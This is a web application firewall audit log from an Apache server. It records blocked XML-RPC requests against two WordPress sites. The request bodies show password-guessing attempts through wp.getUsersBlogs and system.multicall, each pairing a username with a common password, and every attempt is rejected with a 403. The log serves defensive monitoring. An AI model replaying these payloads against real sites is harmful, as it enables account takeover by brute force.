[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120679626585 4269 (- - -) Stopwatch2: 1749120679626585 4269; combined=3291, p1=351, p2=2773, p3=0, p4=0, p5=97, sr=83, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38648c53-Z-- --b554cb27-A-- [05/Jun/2025:17:52:00 +0700] aEF20FwdJdhOudw5hdz8uAAAAIk 103.236.140.4 53056 103.236.140.4 8181 --b554cb27-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b554cb27-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin#Admin# --b554cb27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b554cb27-E-- --b554cb27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749120720164110 4817 (- - -) Stopwatch2: 1749120720164110 4817; combined=3674, p1=408, p2=3104, p3=0, p4=0, p5=95, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b554cb27-Z-- --487bac2d-A-- [05/Jun/2025:17:52:20 +0700] aEF25Oth7G2xELALzPZa_QAAAMM 103.236.140.4 53100 103.236.140.4 8181 --487bac2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --487bac2d-C-- wp.getUsersBlogs kesiswaan junior --487bac2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --487bac2d-E-- --487bac2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120740787533 4973 (- - -) Stopwatch2: 1749120740787533 4973; combined=3544, p1=420, p2=2955, p3=0, p4=0, p5=99, sr=90, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487bac2d-Z-- --ca617816-A-- [05/Jun/2025:17:53:20 +0700] aEF3IFwdJdhOudw5hdz81QAAAJI 103.236.140.4 53226 103.236.140.4 8181 --ca617816-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ca617816-C-- wp.getUsersBlogs kesiswaan qwer123456 --ca617816-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca617816-E-- --ca617816-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120800064864 4429 (- - -) Stopwatch2: 1749120800064864 4429; combined=3365, p1=398, p2=2801, p3=0, p4=0, p5=97, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca617816-Z-- --c3443b40-A-- [05/Jun/2025:17:54:29 +0700] aEF3ZSrHpfaS2Cuwh8UIpgAAAEA 103.236.140.4 53412 103.236.140.4 8181 --c3443b40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c3443b40-C-- wp.getUsersBlogs kesiswaan london --c3443b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3443b40-E-- --c3443b40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120869917497 5523 (- - -) Stopwatch2: 1749120869917497 5523; combined=3815, p1=478, p2=3164, p3=0, p4=0, p5=102, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3443b40-Z-- --1e2c576d-A-- [05/Jun/2025:17:55:29 +0700] aEF3oVwdJdhOudw5hdz9EwAAAIM 103.236.140.4 53576 103.236.140.4 8181 --1e2c576d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --1e2c576d-C-- wp.getUsersBlogs kesiswaan Parola12 --1e2c576d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e2c576d-E-- --1e2c576d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120929482622 4482 (- - -) Stopwatch2: 1749120929482622 4482; combined=3410, p1=371, p2=2817, p3=0, p4=0, p5=132, sr=82, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e2c576d-Z-- --5c641a6f-A-- [05/Jun/2025:17:56:31 +0700] aEF33-th7G2xELALzPZbcgAAANI 103.236.140.4 53770 103.236.140.4 8181 --5c641a6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5c641a6f-C-- wp.getUsersBlogs timkreatif Admin123 --5c641a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c641a6f-E-- --5c641a6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120991937280 4451 (- - -) Stopwatch2: 1749120991937280 4451; combined=3321, p1=356, p2=2796, p3=0, p4=0, p5=99, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c641a6f-Z-- --8ed8483d-A-- [05/Jun/2025:17:57:32 +0700] aEF4HFwdJdhOudw5hdz9FwAAAJA 103.236.140.4 53880 103.236.140.4 8181 --8ed8483d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8ed8483d-C-- wp.getUsersBlogs timkreatif 1984 --8ed8483d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed8483d-E-- --8ed8483d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121052301095 4979 (- - -) Stopwatch2: 1749121052301095 4979; combined=3704, p1=423, p2=3042, p3=0, p4=0, p5=138, sr=85, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed8483d-Z-- --5901d348-A-- [05/Jun/2025:17:57:37 +0700] aEF4Ieth7G2xELALzPZbhQAAAMs 103.236.140.4 53912 103.236.140.4 8181 --5901d348-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5901d348-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsolehx --5901d348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5901d348-E-- --5901d348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749121057973932 4633 (- - -) Stopwatch2: 1749121057973932 4633; combined=3586, p1=398, p2=2982, p3=0, p4=0, p5=117, sr=79, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5901d348-Z-- --76dc3373-A-- [05/Jun/2025:17:58:32 +0700] aEF4WCrHpfaS2Cuwh8UI2QAAAEk 103.236.140.4 54078 103.236.140.4 8181 --76dc3373-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --76dc3373-C-- wp.getUsersBlogs timkreatif admin12345 --76dc3373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76dc3373-E-- --76dc3373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121112381352 4986 (- - -) Stopwatch2: 1749121112381352 4986; combined=3683, p1=382, p2=3102, p3=0, p4=0, p5=114, sr=81, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76dc3373-Z-- --21d2926c-A-- [05/Jun/2025:17:58:54 +0700] aEF4bn-K7ToMdu-YSIJUTwAAAAg 103.236.140.4 54142 103.236.140.4 8181 --21d2926c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --21d2926c-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminantix2019 --21d2926c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21d2926c-E-- --21d2926c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749121134347041 4419 (- - -) Stopwatch2: 1749121134347041 4419; combined=3428, p1=384, p2=2879, p3=0, p4=0, p5=96, sr=101, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21d2926c-Z-- --f87c1c3e-A-- [05/Jun/2025:17:59:32 +0700] aEF4lH-K7ToMdu-YSIJUfQAAAAc 103.236.140.4 54254 103.236.140.4 8181 --f87c1c3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f87c1c3e-C-- wp.getUsersBlogs timkreatif Admin@321 --f87c1c3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f87c1c3e-E-- --f87c1c3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121172584507 4474 (- - -) Stopwatch2: 1749121172584507 4474; combined=3381, p1=371, p2=2845, p3=0, p4=0, p5=96, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f87c1c3e-Z-- --c611c63d-A-- [05/Jun/2025:18:00:32 +0700] aEF40H-K7ToMdu-YSIJUxgAAAAo 103.236.140.4 54434 103.236.140.4 8181 --c611c63d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c611c63d-C-- wp.getUsersBlogs timkreatif Administrator123 --c611c63d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c611c63d-E-- --c611c63d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121232688540 4218 (- - -) Stopwatch2: 1749121232688540 4218; combined=3259, p1=343, p2=2727, p3=0, p4=0, p5=108, sr=80, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c611c63d-Z-- --ede4406d-A-- [05/Jun/2025:18:01:36 +0700] aEF5EOth7G2xELALzPZbuAAAANg 103.236.140.4 54634 103.236.140.4 8181 --ede4406d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ede4406d-C-- wp.getUsersBlogs timkreatif manager123 --ede4406d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ede4406d-E-- --ede4406d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121296006512 4173 (- - -) Stopwatch2: 1749121296006512 4173; combined=3215, p1=339, p2=2712, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ede4406d-Z-- --fc6fea71-A-- [05/Jun/2025:18:02:37 +0700] aEF5TX-K7ToMdu-YSIJVLgAAAAA 103.236.140.4 54738 103.236.140.4 8181 --fc6fea71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fc6fea71-C-- wp.getUsersBlogs timkreatif explorer --fc6fea71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc6fea71-E-- --fc6fea71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121357380964 5583 (- - -) Stopwatch2: 1749121357380964 5583; combined=3826, p1=556, p2=3070, p3=0, p4=0, p5=114, sr=154, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc6fea71-Z-- --d7fde75c-A-- [05/Jun/2025:18:03:37 +0700] aEF5ieth7G2xELALzPZbxQAAAM0 103.236.140.4 54922 103.236.140.4 8181 --d7fde75c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d7fde75c-C-- wp.getUsersBlogs timkreatif support --d7fde75c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7fde75c-E-- --d7fde75c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121417682775 5438 (- - -) Stopwatch2: 1749121417682775 5438; combined=3809, p1=488, p2=3151, p3=0, p4=0, p5=100, sr=102, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fde75c-Z-- --33954631-A-- [05/Jun/2025:18:04:21 +0700] aEF5teth7G2xELALzPZb1gAAANY 103.236.140.4 55014 103.236.140.4 8181 --33954631-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 